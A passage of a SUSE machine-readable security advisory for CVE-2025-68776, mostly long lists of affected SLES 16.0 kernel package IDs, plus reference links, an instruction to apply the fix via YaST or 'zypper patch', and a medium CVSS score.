"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68776",
"url": "https://www.suse.com/security/cve/CVE-2025-68776"
},
{
"category": "external",
"summary": "SUSE Bug 1256659 for CVE-2025-68776",
"url": "https://bugzilla.suse.com/1256659"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.9,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
